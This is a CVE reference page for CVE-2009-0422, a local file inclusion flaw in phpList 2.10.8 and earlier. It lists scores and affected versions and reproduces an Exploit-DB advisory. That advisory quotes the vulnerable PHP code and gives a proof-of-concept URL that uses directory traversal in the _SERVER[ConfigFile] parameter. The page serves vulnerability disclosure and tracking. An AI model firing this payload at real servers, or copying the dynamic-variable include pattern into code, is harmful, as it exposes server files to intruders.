CVE-2009-0422
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Dynamic variable evaluation vulnerability in lists/admin.php in phpList 2.10.8 and earlier, when register_globals is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the _SERVER[ConfigFile] parameter to admin/index.php.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 7778
Publication date : 2009-01-13 23h00 +00:00
Author : BugReport.IR
EDB Verified : Yes
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: phpList Local File inclusion
# Vendor: http://www.phplist.com
# Bug: Local File Inclusion
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_60.htm
###################################################################
####################
- Description:
####################
Quote From vendor:"phplist is an open-source newsletter manager. phplist is free to download, install and use, and is easy to integrate with any website.
phplist is downloaded more than 10 000 times per month and is listed in the top open source projects for vitality score on Freshmeat.
phplist is sponsored by tincan."
####################
- Vulnerability:
####################
+--> Local File Inclusion
Because of the vulnerability in "admin/index.php", When "register_globals" is disabled (Default PHP Configuration) It is possible for remote attackers to
include arbitrary files from local resources before performing authentication.
Code Snippet:
/lists/admin.php #line:10-18
if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
# fix register globals, for now, should be phased out gradually
# sure, this gets around the entire reason that regLANGUAGE_SWITCHister globals
# should be off, but going through three years of code takes a long time....
foreach ($_REQUEST as $key => $val) {
$$key = $val;
}
}
/lists/admin.php #line:41-56
if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
include $_SERVER["ConfigFile"];
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
print '<!-- using '.$cline["c"].' -->'."\n";
include $cline["c"];
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
# print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
include $_ENV["CONFIG"];
} elseif (is_file("../config/config.php")) {
print '<!-- using ../config/config.php -->'."\n";
include "../config/config.php";
} else {
print "Error, cannot find config file\n";
exit;
}
####################
- POC:
####################
http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess
####################
- Credit:
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
# milw0rm.com [2009-01-14]
Products Mentioned
Configuraton 0
Tincan>>Phplist >> Version To (including) 2.10.8
- Tincan>>Phplist >> Version 1.0 (Open CPE detail)
- Tincan>>Phplist >> Version 1.0.1 (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.2b (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.3b (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.4b (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.5 (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.5b (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.6 (Open CPE detail)
- Tincan>>Phplist >> Version 1.1.7 (Open CPE detail)
- Tincan>>Phplist >> Version 1.3.5 (Open CPE detail)
- Tincan>>Phplist >> Version 1.3.7 (Open CPE detail)
- Tincan>>Phplist >> Version 1.4.1 (Open CPE detail)
- Tincan>>Phplist >> Version 1.5.0 (Open CPE detail)
- Tincan>>Phplist >> Version 1.5.1 (Open CPE detail)
- Tincan>>Phplist >> Version 1.6.0 (Open CPE detail)
- Tincan>>Phplist >> Version 1.6.1 (Open CPE detail)
- Tincan>>Phplist >> Version 1.6.3 (Open CPE detail)
- Tincan>>Phplist >> Version 1.6.4 (Open CPE detail)
- Tincan>>Phplist >> Version 1.7.0 (Open CPE detail)
- Tincan>>Phplist >> Version 1.7.1 (Open CPE detail)
- Tincan>>Phplist >> Version 1.8.0 (Open CPE detail)
- Tincan>>Phplist >> Version 1.9.0 (Open CPE detail)
- Tincan>>Phplist >> Version 1.9.1 (Open CPE detail)
- Tincan>>Phplist >> Version 1.9.2 (Open CPE detail)
- Tincan>>Phplist >> Version 1.9.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.1.0 (Open CPE detail)
- Tincan>>Phplist >> Version 2.1.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.1.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.1.4 (Open CPE detail)
- Tincan>>Phplist >> Version 2.2.0 (Open CPE detail)
- Tincan>>Phplist >> Version 2.2.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.3.0 (Open CPE detail)
- Tincan>>Phplist >> Version 2.3.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.3.2 (Open CPE detail)
- Tincan>>Phplist >> Version 2.3.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.3.4 (Open CPE detail)
- Tincan>>Phplist >> Version 2.4.0 (Open CPE detail)
- Tincan>>Phplist >> Version 2.4.7 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.0 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.2 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.4 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.5 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.6 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.7 (Open CPE detail)
- Tincan>>Phplist >> Version 2.5.8 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6.0 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6.2 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6.4 (Open CPE detail)
- Tincan>>Phplist >> Version 2.6.5 (Open CPE detail)
- Tincan>>Phplist >> Version 2.7.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.7.2 (Open CPE detail)
- Tincan>>Phplist >> Version 2.8.2 (Open CPE detail)
- Tincan>>Phplist >> Version 2.8.7 (Open CPE detail)
- Tincan>>Phplist >> Version 2.8.12 (Open CPE detail)
- Tincan>>Phplist >> Version 2.9.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.9.4 (Open CPE detail)
- Tincan>>Phplist >> Version 2.9.5 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.1 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.2 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.3 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.4 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.5 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.6 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.7 (Open CPE detail)
- Tincan>>Phplist >> Version 2.10.8 (Open CPE detail)
Tincan>>Phplist >> Version 1.0
- Tincan>>Phplist >> Version 1.0 (Open CPE detail)
Tincan>>Phplist >> Version 1.0.1
- Tincan>>Phplist >> Version 1.0.1 (Open CPE detail)
Tincan>>Phplist >> Version 1.1.2b
- Tincan>>Phplist >> Version 1.1.2b (Open CPE detail)
Tincan>>Phplist >> Version 1.1.3b
- Tincan>>Phplist >> Version 1.1.3b (Open CPE detail)
Tincan>>Phplist >> Version 1.1.4b
- Tincan>>Phplist >> Version 1.1.4b (Open CPE detail)
Tincan>>Phplist >> Version 1.1.5
- Tincan>>Phplist >> Version 1.1.5 (Open CPE detail)
Tincan>>Phplist >> Version 1.1.5b
- Tincan>>Phplist >> Version 1.1.5b (Open CPE detail)
Tincan>>Phplist >> Version 1.1.6
- Tincan>>Phplist >> Version 1.1.6 (Open CPE detail)
Tincan>>Phplist >> Version 1.1.7
- Tincan>>Phplist >> Version 1.1.7 (Open CPE detail)
Tincan>>Phplist >> Version 1.3.5
- Tincan>>Phplist >> Version 1.3.5 (Open CPE detail)
Tincan>>Phplist >> Version 1.3.7
- Tincan>>Phplist >> Version 1.3.7 (Open CPE detail)
Tincan>>Phplist >> Version 1.4.1
- Tincan>>Phplist >> Version 1.4.1 (Open CPE detail)
Tincan>>Phplist >> Version 1.5.0
- Tincan>>Phplist >> Version 1.5.0 (Open CPE detail)
Tincan>>Phplist >> Version 1.5.1
- Tincan>>Phplist >> Version 1.5.1 (Open CPE detail)
Tincan>>Phplist >> Version 1.6.0
- Tincan>>Phplist >> Version 1.6.0 (Open CPE detail)
Tincan>>Phplist >> Version 1.6.1
- Tincan>>Phplist >> Version 1.6.1 (Open CPE detail)
Tincan>>Phplist >> Version 1.6.3
- Tincan>>Phplist >> Version 1.6.3 (Open CPE detail)
Tincan>>Phplist >> Version 1.6.4
- Tincan>>Phplist >> Version 1.6.4 (Open CPE detail)
Tincan>>Phplist >> Version 1.7.0
- Tincan>>Phplist >> Version 1.7.0 (Open CPE detail)
Tincan>>Phplist >> Version 1.7.1
- Tincan>>Phplist >> Version 1.7.1 (Open CPE detail)
Tincan>>Phplist >> Version 1.8.0
- Tincan>>Phplist >> Version 1.8.0 (Open CPE detail)
Tincan>>Phplist >> Version 1.9.0
- Tincan>>Phplist >> Version 1.9.0 (Open CPE detail)
Tincan>>Phplist >> Version 1.9.1
- Tincan>>Phplist >> Version 1.9.1 (Open CPE detail)
Tincan>>Phplist >> Version 1.9.2
- Tincan>>Phplist >> Version 1.9.2 (Open CPE detail)
Tincan>>Phplist >> Version 1.9.3
- Tincan>>Phplist >> Version 1.9.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.1.0
- Tincan>>Phplist >> Version 2.1.0 (Open CPE detail)
Tincan>>Phplist >> Version 2.1.1
- Tincan>>Phplist >> Version 2.1.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.1.3
- Tincan>>Phplist >> Version 2.1.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.1.4
- Tincan>>Phplist >> Version 2.1.4 (Open CPE detail)
Tincan>>Phplist >> Version 2.2.0
- Tincan>>Phplist >> Version 2.2.0 (Open CPE detail)
Tincan>>Phplist >> Version 2.2.1
- Tincan>>Phplist >> Version 2.2.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.3.0
- Tincan>>Phplist >> Version 2.3.0 (Open CPE detail)
Tincan>>Phplist >> Version 2.3.1
- Tincan>>Phplist >> Version 2.3.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.3.2
- Tincan>>Phplist >> Version 2.3.2 (Open CPE detail)
Tincan>>Phplist >> Version 2.3.3
- Tincan>>Phplist >> Version 2.3.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.3.4
- Tincan>>Phplist >> Version 2.3.4 (Open CPE detail)
Tincan>>Phplist >> Version 2.4.0
- Tincan>>Phplist >> Version 2.4.0 (Open CPE detail)
Tincan>>Phplist >> Version 2.4.7
- Tincan>>Phplist >> Version 2.4.7 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.0
- Tincan>>Phplist >> Version 2.5.0 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.1
- Tincan>>Phplist >> Version 2.5.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.2
- Tincan>>Phplist >> Version 2.5.2 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.3
- Tincan>>Phplist >> Version 2.5.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.4
- Tincan>>Phplist >> Version 2.5.4 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.5
- Tincan>>Phplist >> Version 2.5.5 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.6
- Tincan>>Phplist >> Version 2.5.6 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.7
- Tincan>>Phplist >> Version 2.5.7 (Open CPE detail)
Tincan>>Phplist >> Version 2.5.8
- Tincan>>Phplist >> Version 2.5.8 (Open CPE detail)
Tincan>>Phplist >> Version 2.6
- Tincan>>Phplist >> Version 2.6 (Open CPE detail)
Tincan>>Phplist >> Version 2.6.0
- Tincan>>Phplist >> Version 2.6.0 (Open CPE detail)
Tincan>>Phplist >> Version 2.6.1
- Tincan>>Phplist >> Version 2.6.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.6.2
- Tincan>>Phplist >> Version 2.6.2 (Open CPE detail)
Tincan>>Phplist >> Version 2.6.3
- Tincan>>Phplist >> Version 2.6.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.6.4
- Tincan>>Phplist >> Version 2.6.4 (Open CPE detail)
Tincan>>Phplist >> Version 2.6.5
- Tincan>>Phplist >> Version 2.6.5 (Open CPE detail)
Tincan>>Phplist >> Version 2.7.1
- Tincan>>Phplist >> Version 2.7.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.7.2
- Tincan>>Phplist >> Version 2.7.2 (Open CPE detail)
Tincan>>Phplist >> Version 2.8.2
- Tincan>>Phplist >> Version 2.8.2 (Open CPE detail)
Tincan>>Phplist >> Version 2.8.7
- Tincan>>Phplist >> Version 2.8.7 (Open CPE detail)
Tincan>>Phplist >> Version 2.8.12
- Tincan>>Phplist >> Version 2.8.12 (Open CPE detail)
Tincan>>Phplist >> Version 2.9.3
- Tincan>>Phplist >> Version 2.9.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.9.4
- Tincan>>Phplist >> Version 2.9.4 (Open CPE detail)
Tincan>>Phplist >> Version 2.9.5
- Tincan>>Phplist >> Version 2.9.5 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.1
- Tincan>>Phplist >> Version 2.10.1 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.2
- Tincan>>Phplist >> Version 2.10.2 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.3
- Tincan>>Phplist >> Version 2.10.3 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.4
- Tincan>>Phplist >> Version 2.10.4 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.5
- Tincan>>Phplist >> Version 2.10.5 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.6
- Tincan>>Phplist >> Version 2.10.6 (Open CPE detail)
Tincan>>Phplist >> Version 2.10.7
- Tincan>>Phplist >> Version 2.10.7 (Open CPE detail)
References
http://www.securityfocus.com/archive/1/500057/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
